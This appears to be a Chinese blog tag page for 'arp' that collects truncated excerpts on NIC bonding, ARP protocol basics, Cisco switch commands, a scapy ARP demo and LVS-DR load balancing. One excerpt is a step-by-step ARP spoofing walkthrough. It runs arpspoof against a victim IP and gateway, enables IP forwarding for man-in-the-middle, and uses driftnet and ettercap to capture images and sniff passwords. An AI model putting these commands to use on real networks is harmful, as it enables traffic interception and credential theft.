arp

1 什么是bond 网卡bond是通过多张网卡绑定为一个逻辑网卡，实现本地网卡的冗余，带宽扩容和负载均衡，在生产场景中是一种常用的技术。Kernels 2.4.12及以后的版本均供bonding模块，以前的版本可以通过patch实现。可以通过以下命令确定内核是否支持 bonding： 1 2 3 [root@lixin network-scripts] #cat /boot/config-2.6.32-573.el6.x86_64 |grep -i bonding CONFIG_BONDING=m [root@lixin network-scripts] # 2 bond的模式 bond的模式常用的有两种： mode=0（balance-rr） 表示负载分担round-robin，并且是轮询的方式比如第一个包走eth0，第二个包走eth1，直到数据包发送完毕。 优点：流量提高一倍 缺点：需要接入交换机做端口聚合，否则可能无法使用 mode=1（active-backup） 表示主备模式，即同时只有1块网卡在工作。 优点：冗余性高 缺点：链路利用率低，两块网卡只有1块在工作 bond其他模式： mode=2(balance-xor)(平衡策略) 表示XOR Hash负载分担，和交换机的聚合强制不协商方式配合。（需要xmit_hash_policy，需要交换机配置port

继上次实现了 Ping 之后，尝试进入更底层的网络接口层实现局域网的 ARP 报文收发 ARP 协议概述 ARP(Address Resolution Protocol) 地址解析协议是用来通过网络层地址(IP地址)去寻找数据链路层地址(MAC地址)的网络传输协议. 在以太网(Ethernet)协议中规定， 同一局域网中 的一台主机要和另一台主机进行直接通信，必须要知道目标主机的 MAC 地址。而在 TCP/IP 协议中，网络层和传输层只关心目标主机的IP地址。这就导致在以太网中使用 IP 协议时，数据链路层的以太网协议接到上层IP协议提供的数据中，只包含目的主机的IP地址。于是需要一种方法，根据目的主机的IP地址，获得其MAC地址。这就是 ARP 协议要做的事情。所谓地址解析（address resolution）就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。另外，当发送主机和目的主机 不在同一个局域网中时 ，即便知道对方的MAC地址，两者也不能直接通信，必须经过路由转发才可以。所以此时，发送主机通过ARP协议获得的将不是目的主机的真实MAC地址，而是一台可以通往局域网外的路由器的MAC地址。于是此后发送主机发往目的主机的所有帧，都将发往该路由器，通过它向外发送。这种情况称为委托ARP或ARP代理（ARP Proxy）。—— 地址解析协议 报文格式 以太网首部:

部署与网络规划 命令 三层交换 　 开启路由功能 ip routing 开启路由接口 no switchport 生成树STP 　 开启生成树 spanning-tree vlan vlan-list 指定根网桥 spanning-tree vlan vlan-list root {primary/secondary} 指定根网桥（优先级） spanning-tree vlan vlan-list priority 0-65535 修改端口成本 spanning-tree vlan vlan-list cost cost 修改端口优先级 spanning-tree vlan vlan-list port-priority 0-255 配置速端口 spanning-tree portfast 热备份路由HSRP 　 配置为HSRP组成员 standby group-number ip 虚拟ip 配置HSRP优先级 standby group-number priority 0-255 配置HSRP占先权 standby group-number preempt 配置HSRP端口跟踪 standby group-number track f0/0 interface-priority IP地址跟踪 tracert ip ACL 　 标准acl access-list 表号 permit

ARP协议 目录 ARP协议 1、ARP协议概述 2、ARP协议作用： 3、ARP协议原理： 1）发送ARP广播请求 2）接受ARP单播应答 4、ARP的工作过程 5、ARP代理 ​ 6、ARP攻击或欺骗的原理是： 1）、ARP协议没有验证机制，所以容易被arp偷渡攻击 2）、ARP攻击者通过发送虚假伪造的arp报文对受害者进行ARP缓存投毒 7、ARP攻击防御： 1、静态ARP绑定 2、ARP防火墙 3、硬件级ARP防御： 1、ARP协议概述 “Address Resolution Protocol”（地址解析协议） 当网络设备要发送数据给另一台设备时，必须要知道对方的网络层地址（即IP地址）。IP地址由网络层来提供，但是仅有IP地址是不够的，IP数据报文必须封装成帧才能通过数据链路进行发送。数据帧必须包含目的MAC地址，因此发送端还必须获取到目的MAC地址。通过目的IP地址而获取目的MAC地址的过程是由ARP协议来实现的。 ARP协议是TCP/IP协议簇中的重要组成部分，ARP能够通过目的IP地址发现目标设备的MAC地址，从而实现数据链路层的可达性 2、ARP协议作用： 将IP解析为MAC地址 3、ARP协议原理： 1）发送ARP广播请求 ARP报文内容：我是10.1.1.1 我的MAC：AA-AA-AA-AA 谁是10.1.1.3 你的MAC：？ 2）接受ARP单播应答 4

arp攻击 查看本机ip 使用指令ifconfig inet之后的便是IPV4地址 查一下和自己在同一WiFi下的其他设备 命令： fping -g -r 0 -s 192.168.31.48/24 | grep alive 进行目标IP系统探测（探测是什么系统：电脑or手机） 命令：nmap -T4 -O (目标IP) arp断网攻击 命令：arpspoof -i eth0 -t 192.168.31.140 -r 192.168.31.1 形式：arpspoof -i eth0（一般虚拟机默认为此） -t 目标IP -r 网关 arp欺骗 查本机ip -------------- ifconfig 查和自己处在同一WiFi下的IP ------------ fping -g -r 0 -s 192.168.31.48/24 | grep alive 既然是欺骗，那就不能让目标主机断网，所以要更改配置文件 命令：echo 1 > /proc/sys/net/ipv4/ip_forward cat /proc/sys/net/ipv4/ip_forward arp攻击 命令：arpspoof -i eth0 -t 192.168.31.140 -r 192.168.31.1 抓图片 driftnet -i eth0 实现密码嗅探 ettercap -Tq -i eth0 注意

多网卡的情况下发送二层包需要配置网卡 三层包不需要配置接口 发包方法： sr() 发送三层数据包，等待接收一个或者多个数据包的响应 sr1() 发送三层数据包，只会接收一个数据包的响应 srp() 发送二层数据包，然后一直等待回应 srp1() 发送二层发送数据包，只返回第一个答案 send() 只发送三层数据包，系统自动处理路由和两层信息 sendp() 只发送二层数据包 带p字母的都是发送二层数据包，必须要写以太网头部Ether(),而且如果是多接口一定要指定接口 不带p字母都是发送三层数据包，不需要填Ether头部,不需要指定接口 hwdst表示硬件MAC verbose=False 表示关闭scapy自身的回显 通过Scapy看ARP结构: hwdst表示硬件MAC verbose=False 表示关闭scapy自身的回显 srp返回包结构分析： Demo: #!/usr/bin/python3 from scapy.all import * localmac = '00:0c:29:b6:6b:7d' localip = '192.168.64.128' destip = '192.168.64.129' intername ='eth0' result_raw = srp(Ether(src=localmac,dst='FF:FF:FF:FF:FF:FF')/ARP

文章目录 一、LVS-DR模式 二、LVS-DR数据包的流向分析 三、LVS-DR中的ARP问题 四、keepalived 软件工具 五、LVS-DR的搭建 5.1、环境搭建 5.2、两台LVS的配置 5.3、Web服务器的搭建 5.4、keepalived配置 5.5、验证 5.4、总结 一、LVS-DR模式 关于群集的负载调度技术，可以基于IP端口，内容等进行分发，其中IP负载均衡技术是效率最高的。 在基于IP的负载均衡模式中，常见的有地址转换，IP隧道、直接路由 这三种工作模式： 直接路由；简称DR模式 采用半开放式的网络结构，与TUN模式的结构类似，但各节点并不是分散在各地，而是与调度器位于 同一个物理网络 。 负载调度器与各节点服务器通过 本地网络 连接，不需要建立专用的IP隧道。 二、LVS-DR数据包的流向分析 为方便进行原理分析，将Client与群集机器放在同一网络中，数据包流经的路线为1-2-3-4。 1.Client向目标VIP发出请求，Director (负载均衡器)接收。此时IP包头及数据帧头信息为： 2.Director根据负载均衡算法选择RealServer_1，不修改也不封装IP报文，而是将数据帧的MAC地址改为 RealServer_1的MAC地址，然后在局域网上发送。IP包头及数据帧头信息如下： 3.RealServer_1收到这个帧

部署LVS_DR群集 LVS_DR数据包流向分析 为了方便进行原理分析，将Client0与群集机器放在同一网络中，数据包流经路线为1-2-3-4 1.Client向目标VIP发出请求，Director（负载均衡器）接收。此时IP包头及数据帧信息为： 2.Director根据负载均衡算法选择RealServer_1，不修改也不封装IP报文，而是将数据帧的MAC地址改为RealServer_1的MAC地址，然后在局域网上发送。IP包头及数据帧头信息如下： 3.RealServer_1收到这个帧，解封装后发现目标IP与本机匹配（RealServer事先绑定了VIP），于是处理这个报文。随后重新封装报文，发送到局域网。此时IP包头及数据帧头信息为： 4.Client将收到回复报文。Client认为得到正常的服务而不会知道是哪一台服务器处理的 注意：如果跨网段，那么报文通过路由器经由Internet返回给用户 LVS_DR中的ARP问题 在LVS_DR负载均衡群集中，负载均衡器与节点服务器都要配置相同的VIP地址 在局域网中具有相同的IP地址，势必会造成各服务器ARP通信的紊乱 当一个ARP广播发送到LVS_DR集群时，因为负载均衡器和节点服务器都是连接到相同的网络是上的，它们都会接收到ARP广播 此时只有前端的负载均衡器进行相应，其他节点服务器不应该响应ARP广播 对节点服务器进行处理

本文目录： LVS介绍与集群搭建 负载均衡（LVS）相关名词 在Web端的操作有什么含义 LVS集群的工作模式 IPVS调度器实现的八种负载调度算法 LVS+Keepalived方案实现 常见LVS负载均衡高可用解决方案 一、负载均衡介绍 1、负载均衡的妙用 负载均衡（Load Balance）集群提供了一种廉价、有效、透明的方法，来扩展网络设备和服务器的负载、带宽，增加吞吐量，加强网络数据处理能力，提高网络的灵活性和可用性。 单台计算机无法承受大规模的并发访问或数据流量了，此时需要搭建负载均衡集群把流量分摊到多台节点设备上分别处理，即减少用户等待响应的时间又提升了用户体验； 7*24小时的服务保证，任意一个或多个有限后端节点设备宕机，不能影响整个业务的运行。 2、为什么要用LVS 工作在网络模型的7层，可以针对http应用做一些分流的策略，比如针对域名、目录结构，Nginx单凭这点可利用的场合就远多于LVS了。 最新版本的Nginx也支持4层TCP负载，曾经这是LVS比Nginx好的地方。 Nginx对网络稳定性的依赖非常小，理论上能ping通就就能进行负载功能，这个也是它的优势之一，相反LVS对网络稳定性依赖比较大。 Nginx安装和配置比较简单，测试起来比较方便，它基本能把错误用日志打印出来。LVS的配置、测试就要花比较长的时间了，LVS对网络依赖比较大。

一、 ARP 协议 　　网络层以上的协议用IP地址来标识网络接口，但以太数据帧传输时，以物理地址来标识网络接口。因此我们需要进行IP地址与物理地址之间的转化。 　　对于IPv4来说，我们使用ARP地址解析协议来完成IP地址与物理地址的转化（IPv6使用邻居发现协议进行IP地址与物理地址的转化，它包含在ICMPv6中）。 　　ARP协议提供了网络层地址（IP地址）到物理地址（mac地址）之间的动态映射。ARP协议 是地址解析的通用协议。 二、ARP缓存 　　ARP高速缓存（即ARP表）是 ARP地址解析协议能够高效运行的关键 (如果有多次ARP响应时，以最后一次响应为准)。 　　ARP给IP地址和MAC地址中间做了动态映射，也就是说缓存了一个ARP表，将得到的IP地址和MAC地址对应起来，如果在表中没有查到IP地址对应的MAC地址，就会发广播去找。随着用户的使用，ARP表如果不做任何措，就会变得越来越臃肿缓慢，就降低了网络传输数据的效率，所以ARP缓存中每一项被设置了生存时间，一般是20分钟，从被创建时开始计算，到时则清除，如果在计时期间又被使用了，计时会重置。电脑断电则ARP表内容清空。 三、ARP 报文的各个字段以及含义 　　帧类型： ARP： 0x0806 （2） ARP 首部： 硬件类型：硬件地址的类型， 1 表示以太网地址。（2） 协议类型：协议地址的类型， 0x0800